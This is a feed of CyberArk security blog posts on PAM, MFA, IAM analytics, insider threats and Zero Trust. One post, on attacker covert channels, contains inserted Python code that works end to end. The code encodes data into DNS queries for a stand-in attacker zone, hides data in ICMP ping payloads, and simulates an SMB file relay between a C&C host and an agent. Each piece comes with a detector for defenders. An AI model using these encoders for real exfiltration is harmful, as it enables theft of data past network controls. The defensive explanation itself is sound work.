Enable New Ways of Work: Simplified Remote User Privileged Access with SaaS https://www.cyberark.com/blog/enable-new-ways-of-work-simplified-remote-user-privileged-access-with-saas/ Wed, 30 Sep 2020 12:15:50 +0000 https://www.cyberark.com/?p=103225 Organizations everywhere are undertaking major digital transformation initiatives. Whether moving critical resources to the cloud, or investing in greater automation capabilities, COVID-19 has dramatically accelerated these efforts to quickly enable remote work and keep businesses up and running. As this occurs, IT landscapes are growing in scale and complexity, resulting in a proliferation of privileged accounts. Related privileged credentials exist everywhere in these environments – including in tools and applications – and must be properly and consistently managed.

This sudden sprint to remote work also accelerated a shift to SaaS-based solutions that allow organizations to offload a good deal of the on-premises infrastructure and outsource ongoing maintenance and administrative work so that teams can focus more on security. This is particularly true for privileged access management (PAM) where many organizations have turned to Software as a Service (SaaS).

[Cartoon: “COVID-19 has dramatically accelerated digital transformation.” Source: Marketoonist.com]

Implementing SaaS solutions to enable remote work is critical, but ensuring those solutions are also secure is just as important. This is particularly true for third-party vendors or contractors, who are often not part of the company directory and require ephemeral access to sensitive systems on a day-to-day basis. For these users, as well as the remote workforce at large, many organizations have increased their reliance on VPNs, which have been linked to many high-profile breaches. Beyond the security risk, VPNs are cumbersome to set up and use for privileged access: they grant broad network-level connectivity rather than the granular, per-system access that remote privileged users need, and users who connect this way are at greater risk of misuse or attack if that access is not properly secured.

A Powerful Integration That’s Quick to Deploy and Easy to Use

With a balanced security approach that brings the full benefits of SaaS, today CyberArk launched the first solution that combines all of the necessary elements for securing third-party vendor access to critical systems, without additional on-premises infrastructure. The powerful integration of CyberArk Privilege Cloud and CyberArk Remote Access provides the remote workforce with a strong mix of centralized privileged access controls, Zero Trust access, biometric multi-factor authentication (MFA) and just-in-time provisioning for third party vendors. Customers can now deploy a full SaaS-based privileged access management solution that secures remote user (employees, third-party vendors and contractors) access to critical systems managed by CyberArk. Customers can quickly secure and enable their remote workforce.

Here is how it all works.

First, when a remote user attempts to access the CyberArk web portal, they are redirected to the Vendor Privileged Access Manager web interface, which prompts for MFA: biometric authentication (a retina or fingerprint scan) for smartphone users, or a combination of text message and email, or a voice call, for users without a smartphone. Once authenticated, the user is redirected to the web portal, where they can reach the systems they have been provisioned to access.

Every session is routed through the privileged session management gateway to the Privilege Cloud Connector, so it is automatically isolated, recorded and monitored. Traffic between the Privilege Cloud Connector and the CyberArk-hosted back end travels over an encrypted HTTPS tunnel. The connector retrieves the target credential from the vault and injects it into the session; the credential itself is never sent to the remote employee’s or vendor’s workstation.

[Figure: Enable Remote Work diagram]

As shown above, CyberArk hosts the entire Vendor Privileged Access Manager and Privilege Cloud service in the cloud as a seamless workflow to enable remote employees and third-party vendors. The only self-hosted component of the solution for customers is the Privilege Cloud Connector, which is automatically hardened by CyberArk. CyberArk also hardens the underlying OS, helping organizations save additional time and increase confidence in the overall security of the back end.

Extending use cases is easy. Organizations can choose to rotate passwords, protect and audit cloud console administrators, manage service accounts, record and audit sessions, and secure access for users like third-party vendors and contractors, and more. Managing privileged access under one roof with one single, integrated SaaS solution provides the best of both worlds for security and operations. As remote work becomes even more deeply entrenched into how businesses operate, having a unified, end-to-end solution for securing the entire remote workforce has never been more important.

For those who would like to try CyberArk Remote Access for securing remote vendor access to CyberArk, we are now offering a 30-day free trial. Learn more about CyberArk’s leading PAM as a Service solution.

Why Desktop MFA is Essential to Your Endpoint Security https://www.cyberark.com/blog/why-desktop-mfa-is-essential-to-your-endpoint-security/ Tue, 29 Sep 2020 13:00:45 +0000 https://www.cyberark.com/?p=99350 An employee’s work laptop can be a treasure trove for any malicious actor who can get access to it.

Think about it. Many of the apps you use on your laptop don’t ask you for credentials, especially if your organization doesn’t have strong multi-factor authentication (MFA) policies. App passwords may be cached in your browser for convenience, but that also makes them an easy target for credential theft. If your organization relies on certificate-based authentication or Integrated Windows Authentication (IWA) for convenience, most apps are directly accessible from a trusted device without any authentication challenge. Considering that even a mid-sized company may use more than 100 SaaS applications, imagine the damage someone could do with access to even a few of them.

Even though the world is moving toward cloud storage, sync clients such as OneDrive, Box or Dropbox keep local copies of important, sensitive files on the laptop, and employees who are constantly on the move, such as sales staff, deliberately keep critical information locally because they may not always have access to the cloud. Such files may contain sales leads, financial information, partner information, code, trade secrets and so on. Worst case, a careless employee may have stored their passwords in a spreadsheet.

In addition to sensitive corporate data, an average laptop may contain several files with personal information of the owner, such as their address, phone number, email, SSN, bank account information and credit card details. In the wrong hands, these vital financial records can be used for identity theft.

What’s more, email clients such as Outlook are typically in an “always open” state, putting them at risk. Employee email addresses can often be used to reset passwords for various services, plus emails themselves often contain sensitive information about the employer. Using social engineering, attackers can use one employee email to procure sensitive information about other employees.

In short, it could be disastrous if even one of your employees loses their laptop. Without strong enterprise password policies in place, chances are good that the password is weak and won’t even withstand a basic brute force attack.

Malicious insiders also target unsecured laptops, looking to steal valuable information from colleagues or senior executives, or to gain privileged access to corporate systems and data they have no rights to. Insider threats are increasing in frequency and can be particularly dangerous, as they can go undetected for weeks, months or even years.

So, it’s absolutely essential that work (and even personal) laptops are protected with strong MFA on the boot screen and lock screen. Not doing so would leave a dangerous gap in your organization’s digital security.

To address this pain point, CyberArk Idaptive cloud agents support strong MFA for boot screen and lock screen of Windows and macOS devices with features such as:

  • Risk-based adaptive MFA
  • Support for MFA on RDP/RDS access to Windows servers
  • Self-service password reset based on authentication challenges to minimize IT helpdesk support and costs
  • MFA for offline devices, with the ability to lock and wipe Windows and macOS devices if they are stolen
  • Flexible authentication factors, such as OTP, SMS, email, mobile push, FIDO2 keys (such as YubiKey), etc.

Endpoints pose significant security risks for today’s digital businesses – especially with the current large remote workforce. Savvy attackers can exploit endpoint vulnerabilities to steal confidential information or disrupt IT services. By taking a defense-in-depth approach to endpoint security – instituting a strong mix of security controls from MFA to privileged access management – you can strengthen overall security posture and reduce exposure.

To learn more about securing remote users, endpoints and critical assets, visit our Risk Distancing Resource Center.

Simple Rules for Smart IAM Solutions – Part 1 https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions/ Fri, 25 Sep 2020 17:36:33 +0000 https://www.cyberark.com/?p=99378

Evaluating IAM solutions can be complex. Understanding how to evaluate security analytics is key to making decisions.

In this day and age of Machine Learning (ML), analytics systems can become very complex, very quickly. Having some basic rules and seemingly simple questions to ask will come in handy when evaluating such systems. In this blog, I’ll lay down some basic rules to help you evaluate and choose the right IAM and MFA solutions, especially if you’re looking at solutions based on User and Entity Behavior Analytics (UEBA/UBA), Identity Analytics or general Security Analytics. So, let’s dive in!

Security Analytics is all about generating insights by collecting, preparing, and analyzing data from various sources. With these insights, automated responses are orchestrated that can help IT and security teams stay ahead of malicious actors and attacks to mitigate risk. Traditional Security Intelligence tools have largely focused on collecting logs and event data from networking and infrastructure sources to generate those insights and automate responses. However, in today’s perimeter-less world, where Identity is the only true perimeter, adopting a Zero Trust approach to reduce risk requires these systems to leverage the rich information generated within Identity and Access Management systems and embrace the concept of User Behavior Risk.

Consequently, identity and user behavior risk analytics needs to be a key component of any security analytics strategy, which involves intelligently protecting access to critical resources from potentially risky users. Pretty much every Identity and Access Management (IAM) tool these days claims to adapt to risky situations and offer some sort of “adaptive risk access” through identity and user behavior analytics. It then becomes challenging to differentiate between these tools, especially given the technical complexity of the various mechanisms that can be used to analyze the data, such as rules engines and machine learning. IT and security personnel tasked with analyzing and testing these tools should therefore keep the following simple, yet powerful rules of thumb in mind.

Remember – The more contexts, the more the fidelity and reliability of the tool. If you have garbage going in, you will have garbage coming out.

Analytics is all about the quality of the data, its comprehensiveness, and the data science that drives how well it is analyzed (also known as the model). Quality refers to how well cleaned, prepared and wrangled the data is for downstream consumption. Comprehensiveness refers to the variety of contexts and sources the tool collects data from. “How well” covers not just the quantity of data but also the algorithms, encoding and normalization techniques used to efficiently and accurately extract identity behavior and assess risk continuously from an optimally sized dataset.

This is critical, especially when dealing with large volumes of data over a lengthy period of time. For example, when a user accesses an app, they use an endpoint device (such as a mobile phone), from a location, traverse a network comprising firewalls, get authenticated, assume a role and then perform some activity. A good IAM tool is able to gather information from all of these contexts (device, location, time, network, directory services, role-based access, etc.) and then “learn” access patterns over a period of time.

Automation is key.

Okay, so you are able to “intelligently” and “continuously” gain visibility into the behavioral patterns of identities, but are you also able to protect the critical resources that may be under attack? And what does protection entail? Here again, remember the various contexts. A good tool is able to protect the endpoint, step up authentication and enforce the strictest assurance levels through multi-factor authentication (MFA), limit access through coarse-grained role-based access control (RBAC) and fine-grained entitlement management, log malicious activity and notify the right admins and users. And all of this happens seamlessly and “automatically”.

Automation goes hand in hand with Orchestration.

The right IAM tool is able to “Orchestrate” with other key IT and SIEM tools such that other workflows and remediation methods may be invoked in an automated way leveraging such technologies as webhooks, APIs and exchanging information through standard event formats and programmatic interfaces.

UBA based continuous authentication must lead to better end-user experience!

Deploying this tool must not come at the cost of user experience. Period. One of the most significant challenges IT and security teams face these days is protecting the identity perimeter while keeping the good identities happy! Continuous risk assessment, stepping up security only when required, is therefore a must, and the tool must offer it through the right policy knobs, with granularity down to the individual application.

Now that the rules have been established, do visit our product portfolio and sign up for a free trial to see how Idaptive will help you address and achieve these through our UEBA based adaptive MFA and Access Management solutions.

Part 2 in this series

Part 3 in this series

Prehistoric Security Controls: Deconstructing the Jurassic Park Insider Threat Incident https://www.cyberark.com/blog/prehistoric-security-controls-deconstructing-the-jurassic-park-insider-threat-incident/ Thu, 24 Sep 2020 12:59:30 +0000 https://www.cyberark.com/?p=102970 Cyber attackers are hitting organizations from every angle — and, increasingly, from inside. According to a 2020 Ponemon Institute study, the frequency of insider threat incidents spiked by 47% since 2018 and the average annual cost to organizations rose by 31% to $11.45M.

While the majority of insider threats can be attributed to employee mistakes or negligence, malicious insiders (i.e. employees or third parties who abuse legitimate access to company systems for nefarious purposes) are difficult to spot. They often operate under the radar for long periods of time and, with the right resources, can take down organizations both large and small. While they are growing in number, insider threats are nothing new.

In the spirit of National Insider Threat Awareness Month this September, here’s a deconstruction of the infamous “Jurassic Park” incident.

The Definition of a Malicious Insider

Dennis Nedry, the lead computer programmer for Jurassic Park, could not fit the profile of a malicious insider more perfectly. Nedry was extremely motivated to bring John Hammond’s beloved park to extinction (pun intended). He’s a disgruntled employee who feels under-appreciated for his work, and his motivation was mainly financial. It’s teased early on in the story that he’s in some sort of financial trouble, which likely drove him to sell out to Hammond’s biggest competitor for a payout of $1.5M (equivalent to $2,676,093.43 in 2020). Nedry had approximately 18 minutes to shut down the security systems, retrieve over a dozen healthy dinosaur embryos and make his way to the east dock to escape the island and collect his fee.

So how does he do it?

From the movie, we know the park’s control room is equipped with Macintosh Quadra 700s, best-in-class computers in the early 90s. In one scene, the camera zooms in on Nedry’s screen, giving a glimpse of three shell windows of code written in an object-based programming language developed by Apple. Believe it or not, someone has reviewed that code by installing the appropriate OS on an emulator for older Apple systems. Turns out, it is just the sample code that shipped with Apple’s Macintosh Programmer’s Workshop (MPW).

Since these Hollywood theatrics can’t tell us anything, we’ll speculate on Nedry’s attack methodology based on how the movie plays out.

Hold on to Your Butts: An Insider Attack in Action

When chief engineer Ray Arnold tries to bring the systems back online, it’s clear Nedry covered his tracks before installing the malicious code. By disabling keystroke logging on the computer, Nedry made it nearly impossible to locate the malicious code without manually reviewing two million lines of code.

Making matters worse, Arnold can’t crack Nedry’s password to reactivate the security systems. His only remaining option is to perform a manual reboot, which in theory would bring the systems back online – and we all know how the rest of the movie goes.

Let’s dig in a bit deeper and try to break down Nedry’s attack methodology. From the dialogue, we know he is a skilled programmer. He ran whte_rbt.obj from his workstation: executable code disguised with an .obj extension, which opened a backdoor. Since the same privileged credentials were likely used throughout the park’s systems, the malicious code propagated across the park.

To inject this malicious code, Nedry had to do one of the following:

  1. Write the code onsite, make it executable and run it in an administrative context from his workstation. With his over-provisioned administrative access rights and the park’s poor credential management practices (default passwords and credential reuse), we can assume this is the likely scenario.
  2. Bring the code in from outside on removable media (a floppy disk in 1993, a USB drive today), or download it over the park’s external network connection. Without restrictive policies on removable media and outbound access, either path would have worked.

Privilege was everywhere in Jurassic Park. The central mainframe communicated with all the operational technology components within the park. Because of this, Nedry had complete and total control over not only the digital environment, but the physical infrastructure of the facility including CCTV, doors and, of course, the fences to the dinosaur pens. Judging by personal photos on Nedry’s device, we can assume he is authenticated to all of these systems from his workstation, which has access to external networks and unrestricted removable media — a huge no-no in OT environments, even in the 90s.

Bottom line, there was little to no separation between Nedry’s device (an IT asset) and the critical OT systems in the park. As we recently explored, attackers with access to OT assets can corrupt or shut down critical systems and even put human health and safety in danger. It’s not just science fiction: many of today’s energy, utility and manufacturing facilities rely on these controls to protect their data, employees and customers.

Attackers, Uh, Find a Way: Protect What Matters with Privileged Access Management

Although it takes away from the thrill and excitement of the movie, with the right privileged access management controls in place, Jurassic Park could still be standing.

Beyond standard privileged account and credential management (i.e. vaulting and rotation), the park would’ve benefitted from basic cybersecurity best practices such as implementing the principle of least privilege and attestation for privileged tasks. These would have restricted Nedry’s unchecked privileges to the minimum levels of access, or permissions, required to do his job.

Privileged session management and threat detection capabilities would have enabled session suspension and termination when suspicious activities or commands were executed, while maintaining a full audit trail. Additionally, strong application control, a default-deny allow list rather than a deny list, would have blocked unknown applications and anything launched from removable media from running, stopping the spread of malicious code throughout the environment. By enforcing these controls, Nedry would not have been able to reach multiple systems through a single application from the same terminal.

Even if Nedry had gained access legitimately through a system like CyberArk Core Privileged Access Security, he would have had to enter commands one at a time. With single, centralized access in place for all systems and endpoints, command restriction and analytics would have flagged early warning signs, or terminated his access outright.

Just as life finds a way in Jurassic Park, motivated attackers will find a way, and unlike Nedry they bring no comic relief. In today’s digital world, you must anticipate that malicious characters, both inside and outside your organization, will gain some level of access to IT, OT and even cloud environments. CyberArk solutions are focused on stopping attackers from ever reaching their end target by placing strong privileged access controls around critical resources. Securing privileged access is not chaos theory. Check out our Privileged Access Management Boot Camp or request a demo to get started.

Your Network Through the Eyes of a Hacker https://www.cyberark.com/blog/your-network-through-the-eyes-of-a-hacker/ Tue, 22 Sep 2020 14:01:54 +0000 https://www.cyberark.com/?p=100439 I’m sure your network’s security is top-notch.

You must have already taken care of micro-segmentations, strict firewall policies, and have some kind of EDR solution on the different endpoints. And of course, you’re only allowing secure connections that rely on encrypted protocols.

If you are one of those who take security seriously, you might even run a regular security update routine. And if that’s not enough, you probably also have a qualified SOC team that monitors all of those systems 24/7. Your SOC team submits a report each week that shows several security events that appeared in the different systems but were all examined and characterized as false-positives.

Having said all that — do you feel secure?

In this post, you’re going to learn three stealthy attack techniques you should anticipate and work to avoid. More than that, it’s important that you learn how to expand this knowledge in a way that allows you to protect your network. In order to do that, we will first dive into the mind of a hacker and understand their strategy.

As a white-hat hacker and former red teamer, I can tell you that one of my main goals in an operation is to stay secretive. Staying secretive is an important ingredient of an APT (Advanced Persistent Threat) attack, which features a stealthy threat actor.

The Art of Cyber Warfare

If I had to highlight one key feature of a skilled attacker, it would be patience.

“If it is to your advantage, make a forward move. If not, stay where you are.” – Sun Tzu, The Art of War

An attacker who succeeded in passing your first line of defense and gained initial access will strive to evade existing defense systems. They will not make a move until they are certain about it. And more than that, when they do make a move — they will make sure that you are unaware of it.

“Make your way by unexpected routes and attack unguarded spots.” – Sun Tzu, The Art of War

Strolling in the Dark

It all depends on the attacker’s intelligence data.

The easy scenario is when the attacker has enough information to make a decision about their moves and plans ahead.

The more problematic scenario is when there’s not enough intelligence data. In this situation, the best way for an attacker to remain under-the-radar is to utilize the “must-have” features of an organizational network, such as shared folders, ping messages, and DNS queries.

Why would an attacker use those? Because these protocols are in constant, legitimate use on every network, abusing them requires no pre-operation intelligence, and they shed light on paths the attacker does not yet know.

Even if one of your defense systems catches something unusual, chances are your SOC team will have a hard time investigating exactly what happened. Searching for an unusual pattern in the network traffic of these protocols is like looking for a needle in a haystack.

In the upcoming section, I’ll explain 3 examples of common protocols used by an attacker to their advantage:

1. SMB protocol — enables the shared network folder

2. DNS protocol — enables the translation of domain names to IP addresses

3. ICMP protocol — enables, inter alia, sending ‘ping’ messages

SMB and Shared Network Folders

It’s a common feature of most networks to have some kind of a shared drive, to allow users to share files with each other and to have a backup of a locally saved file.

This service will be open, most of the time, to a wide range of users and systems. It can, therefore, be used as a tool for breaking down your micro-segmentation and firewall rules.

The way a hacker would use a shared drive is by creating a file in a shared folder that will act as a “pipeline” between a Command & Control (C&C) server and an agent. Even if the agent is running on a machine that isn’t allowed to speak with the C&C, it’s more than likely that the two of them can find a shared folder where they can share such a “pipeline” file with each other.

Figure 1. Breaking network segmentation using shared network folders
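The following Python is an added example, not code from the post or from any CyberArk tool, showing the relay in Figure 1 from the defender’s side. It constructs a day of share-access audit lines in a hypothetical `<timestamp> <client> <read|write> <path>` format (Windows “Detailed File Share” auditing, event ID 5145, or a NAS access log carries the same fields), including the write/read ping-pong between a C&C host and an agent, and flags any file whose writer alternates rapidly between exactly two hosts. The hosts, paths, commands and thresholds are all made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Constructed audit-log format (one line per share access):
#   <timestamp> <client ip> <read|write> <unc path>


def simulate_pipeline(commands, c2="10.0.9.40", agent="10.0.5.23",
                      path=r"\\fs01\public\tmp\~wrd0001.tmp",
                      start=datetime(2020, 9, 22, 9, 0, 0)):
    """Constructed traffic for the technique in Figure 1: the C&C host writes a command
    into the pipeline file, the agent reads it, writes its output back, and the C&C reads that."""
    lines, t = [], start
    for _cmd in commands:
        for host, action in ((c2, "write"), (agent, "read"), (agent, "write"), (c2, "read")):
            t += timedelta(seconds=2)
            lines.append(f"{t.strftime(TS_FMT)} {host} {action} {path}")
    return lines


def find_file_pipelines(log_lines, min_handoffs=3, max_gap=60):
    """Behavioural check: a file whose writer alternates between exactly two hosts, with
    each handoff inside max_gap seconds, is being used as a relay rather than as a document."""
    per_file = defaultdict(list)
    for line in log_lines:
        ts, host, action, path = line.split(maxsplit=3)
        per_file[path].append((datetime.strptime(ts, TS_FMT), host, action))

    hits = {}
    for path, events in per_file.items():
        writes = [(t, h) for t, h, a in sorted(events) if a == "write"]
        writers = {h for _, h in writes}
        if len(writers) != 2:
            continue  # one author with many readers, or a genuinely shared document
        handoffs, prev_t, prev_h = 0, None, None
        for t, h in writes:
            if prev_h is not None and h != prev_h and (t - prev_t).total_seconds() <= max_gap:
                handoffs += 1
            prev_t, prev_h = t, h
        if handoffs >= min_handoffs:
            hits[path] = {"hosts": sorted(writers), "handoffs": handoffs,
                          "first": writes[0][0].strftime(TS_FMT),
                          "last": writes[-1][0].strftime(TS_FMT)}
    return hits


def build_sample_log():
    """Constructed day of share activity: normal use plus one pipeline file."""
    normal = [
        # one author, several readers: ordinary file sharing
        r"2020-09-22T08:30:00Z 10.0.5.12 write \\fs01\public\reports\q3.xlsx",
        r"2020-09-22T08:45:10Z 10.0.5.30 read \\fs01\public\reports\q3.xlsx",
        r"2020-09-22T09:10:42Z 10.0.7.9 read \\fs01\public\reports\q3.xlsx",
        # two people editing the same document hours apart: not a relay
        r"2020-09-22T09:05:00Z 10.0.5.12 write \\fs01\public\plans\roadmap.docx",
        r"2020-09-22T11:20:00Z 10.0.5.30 write \\fs01\public\plans\roadmap.docx",
        r"2020-09-22T14:02:00Z 10.0.5.12 write \\fs01\public\plans\roadmap.docx",
        r"2020-09-22T16:40:00Z 10.0.5.30 write \\fs01\public\plans\roadmap.docx",
    ]
    return normal + simulate_pipeline(["whoami", "ipconfig /all", "dir C:\\Users"])


if __name__ == "__main__":
    for path, info in find_file_pipelines(build_sample_log()).items():
        print(path, info)
```

The check keys on the handoff rhythm rather than on file names or content, because the attacker picks both: a temp-looking name in a busy folder is exactly what you should expect. Tune `max_gap` to the polling interval you are worried about and feed the function from whatever produces per-access share records in your environment.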

DNS Beacons

DNS beacons are a well-known technique used to hide the payloads of a session between a C&C server and its agents.

It uses the DNS protocol to bypass firewall rules and relies on the massive amount of DNS queries to “blend into the crowd”.

How does it work?

The agent sends a DNS query for a name under a domain the attacker owns. To the local DNS server it looks like an ordinary request for a domain name translation, but the resolver forwards it up the chain until it reaches the authoritative name server for that domain, which the attacker controls.

In this way, the attacker can answer with any desired payload, in a DNS TXT record for example, and the response reaches the agent through the organization’s own resolvers; in the other direction, the agent encodes its data into the query name itself.

Figure 2. Bypassing firewall rules using DNS queries

Just imagine your crown jewel DB server, leaking the most valuable information, drop by drop, one DNS query after another.
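Here is an added Python example (not from the post) that shows both halves of that drip: the agent packing data into base32 subdomain labels under an attacker-controlled zone, the attacker’s name server reassembling it, and a defender-side check over constructed resolver log lines that flags zones receiving many unique, long, high-entropy labels. The zone `cdn-updates.example`, the `s<seq>.<chunk>.<zone>` label layout, the log format and the thresholds are all assumptions, and the 1,200-byte “database extract” is seeded pseudo-random bytes standing in for the real thing.

```python
import base64
import math
import random
import re
from collections import defaultdict

# Hypothetical attacker-controlled zone for the constructed sample (not from the post).
C2_ZONE = "cdn-updates.example"
CHUNK = 60  # base32 characters per query; stays under the 63-byte DNS label limit


def encode_chunks(data: bytes, zone: str = C2_ZONE, chunk: int = CHUNK) -> list:
    """Agent side: pack data into base32 labels, one chunk per query name.
    Name layout: s<seq>.<base32 chunk>.<zone>"""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    return [f"s{i}.{b32[p:p + chunk]}.{zone}"
            for i, p in enumerate(range(0, len(b32), chunk))]


def decode_chunks(names) -> bytes:
    """Attacker name-server side: reassemble the chunks in sequence order."""
    parts = {}
    for name in names:
        seq, label, _zone = name.split(".", 2)
        parts[int(seq[1:])] = label
    b32 = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 payload labels score far above ordinary hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


# Constructed resolver log format: "<timestamp> <client> query: <qname> <qtype>"
LOG_RE = re.compile(r"^(\S+) (\S+) query: (\S+) (\S+)$")


def find_dns_beacons(log_lines, min_unique=10, min_label_len=20, min_entropy=3.0):
    """Defender side: group queries by registered zone and flag zones that receive
    many unique, long, high-entropy subdomain labels."""
    per_zone = defaultdict(lambda: {"names": set(), "clients": set()})
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _ts, client, qname, _qtype = m.groups()
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # nothing below the registered domain, so no room for a payload
        zone = ".".join(labels[-2:])
        per_zone[zone]["names"].add(qname)
        per_zone[zone]["clients"].add(client)

    suspicious = {}
    for zone, info in per_zone.items():
        names = info["names"]
        if len(names) < min_unique:
            continue
        longest = [max(n.split(".")[:-2], key=len) for n in names]
        mean_len = sum(len(lab) for lab in longest) / len(longest)
        mean_ent = sum(shannon_entropy(lab) for lab in longest) / len(longest)
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            suspicious[zone] = {"queries": len(names), "clients": sorted(info["clients"]),
                                "mean_label_len": round(mean_len, 1),
                                "mean_entropy": round(mean_ent, 2)}
    return suspicious


# Constructed stand-in for a 1200-byte database extract; real exfil is usually
# compressed or encrypted before encoding, so high entropy is realistic.
SECRET = random.Random(1337).randbytes(1200)
EXFIL_QUERIES = encode_chunks(SECRET)


def build_sample_log():
    """Constructed resolver log: a few benign lookups plus the beacon traffic."""
    benign = [
        "2020-09-22T14:01:50Z 10.0.5.23 query: www.example.com A",
        "2020-09-22T14:01:51Z 10.0.5.23 query: mail.example.com MX",
        "2020-09-22T14:01:52Z 10.0.7.9 query: updates.vendor.example A",
    ]
    beacon = [f"2020-09-22T14:02:{i % 60:02d}Z 10.0.5.23 query: {q} TXT"
              for i, q in enumerate(EXFIL_QUERIES)]
    return benign + beacon


if __name__ == "__main__":
    assert decode_chunks(EXFIL_QUERIES) == SECRET
    for zone, stats in find_dns_beacons(build_sample_log()).items():
        print(zone, stats)
```

Note what the detector does not rely on: the query type (attackers use A and CNAME as readily as TXT) or any blocklist of the zone. Its signal is the shape of the labels per zone, which is why a zone-level volume cap on high-entropy subdomains is a better first control than any single-query rule. Grouping on the last two labels is a simplification; use the public suffix list in production so that `co.uk`-style zones are not lumped together.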

ICMP Tunneling

Last but not least is a simple technique in which a hacker uses the payload section of the ICMP ping packet in order to pass whatever payload they would like.

Regular Linux ping echo message:

Figure 3. Ping echo message

Manipulated ping echo message:

Figure 4. Manipulated ping echo message

Ping packets are mostly allowed to pass between different endpoints on the network. It’s an everyday tool that IT teams use to troubleshoot network faults — that’s exactly why it’s a great way to bypass network policies.

Similar to SMB and DNS, the amount of ICMP packets sent on the network is huge, making this method hard to detect.
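As an added example (not the post’s own material), the Python below builds ICMP echo requests the way the figures above show them: a stock Linux ping payload, then same-size packets carrying a SQL statement, and a DPI-style check that verifies the checksum and compares the payload against the stock ping patterns. The stock patterns are assumptions about the tools, not something the post states: iputils ping on 64-bit Linux sends 56 bytes, a 16-byte struct timeval followed by 0x10 through 0x37 (an 8-byte timeval and 0x08 through 0x37 on 32-bit builds), and Windows ping sends 32 bytes of `abcdefghijklmnopqrstuvwabcdefghi`. Nothing touches the network; packets are only built and inspected in memory.

```python
import struct
import time

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
# Assumed stock payloads (see lead-in): iputils ping on 64-bit Linux sends a 16-byte
# timeval followed by 0x10..0x37 (8-byte timeval and 0x08..0x37 on 32-bit builds);
# Windows ping sends 32 bytes of text with no timestamp.
LINUX_PAYLOAD_LEN = 56
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes, icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """ICMP header (type, code, checksum, id, seq) followed by the payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def linux_ping_payload(ts: float) -> bytes:
    """What a stock 64-bit Linux ping puts in the echo request (Figure 3)."""
    sec, usec = int(ts), int(round((ts - int(ts)) * 1_000_000))
    return struct.pack("<qq", sec, usec) + bytes(range(16, LINUX_PAYLOAD_LEN))


def tunnel_packets(data: bytes, ident: int, chunk: int = LINUX_PAYLOAD_LEN) -> list:
    """Attacker side (Figure 4): carry arbitrary data in consecutive echo requests. The chunk
    size matches a stock Linux ping, so a length-only check sees nothing unusual."""
    return [build_echo(ident, seq, data[p:p + chunk])
            for seq, p in enumerate(range(0, len(data), chunk))]


def extract_tunnel_data(packets) -> bytes:
    """Attacker side: reassemble the carried data in sequence order."""
    ordered = sorted(packets, key=lambda pkt: struct.unpack("!H", pkt[6:8])[0])
    return b"".join(pkt[8:] for pkt in ordered)


def inspect_echo(packet: bytes) -> dict:
    """Defender side (DPI): verdict for one ICMP packet (header + payload, no IP header)."""
    if len(packet) < 8:
        return {"ok": False, "reason": "truncated ICMP header"}
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    payload = packet[8:]
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return {"ok": True, "reason": "not an echo packet"}
    if icmp_checksum(packet) != 0:  # a valid packet sums to all ones, complement zero
        return {"ok": False, "reason": "bad checksum", "ident": ident, "seq": seq}
    stock_linux = (len(payload) == LINUX_PAYLOAD_LEN and
                   any(payload[n:] == bytes(range(n, LINUX_PAYLOAD_LEN)) for n in (8, 16)))
    stock_windows = payload == WINDOWS_PATTERN
    if stock_linux or stock_windows:
        return {"ok": True, "reason": "stock ping payload", "ident": ident, "seq": seq}
    return {"ok": False, "reason": "non-standard payload", "ident": ident, "seq": seq,
            "length": len(payload), "payload": payload}


if __name__ == "__main__":
    print(inspect_echo(build_echo(0x1234, 1, linux_ping_payload(time.time())))["reason"])
    for pkt in tunnel_packets(b"SELECT card_no FROM customers;", 0x1234):
        print(inspect_echo(pkt))
```

The payload comparison is deliberately strict: a tunnel that keeps the stock length still fails it, and a tool that copies the stock pattern but varies the timestamp bytes would have to keep that region to 8 or 16 bytes, which caps its bandwidth hard. In production, treat anything that is not a known pattern from a known ping implementation as worth a second look, and pair it with a rate threshold per source.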

So, what can you do against these types of attacks?

Keep your enemies close, but your friends closer — using a firewall to filter the types of traffic that you don’t use is the easy part. But what are you going to do with the traffic you allowed to pass?

Two main methods worth pointing out that can help address these challenges are:

1. Deep Packet Inspection (DPI) — as a security feature in your network can go a long way to detecting the malicious use of packets to transfer payloads, such as DNS beacons and ICMP tunneling

2. Behavioral-based security — an automated proactive approach, in which you can detect behavioral anomalies in your network, such as 2 machines going back and forth from the same file on a shared folder (sound familiar?)

The most important issue here is that you need to embrace the perspective of an attacker on your network.

Look at the “obvious” traffic on your network, the trivial, always-on protocols, and especially the ones in which unusual patterns are hardest to filter out.

Good luck!

Put Privileged Access Management at the Core of NIST Zero Trust Architecture https://www.cyberark.com/blog/put-privileged-access-management-at-the-core-of-nist-zero-trust-architecture/ Tue, 15 Sep 2020 12:30:58 +0000 https://www.cyberark.com/?p=98787 In our mobile, cloud and digital world, physical perimeters have all but disappeared. Gone are the days when users and assets resided within the physical walls of the organization and trust was defined by the perimeter. Today, it’s impossible to contain — let alone trust — all of the people, machines and applications that must dynamically access company systems and data, so Zero Trust models are becoming more popular. Zero Trust, as the name suggests, means anyone and everything trying to connect to an enterprise system is verified before access is granted.

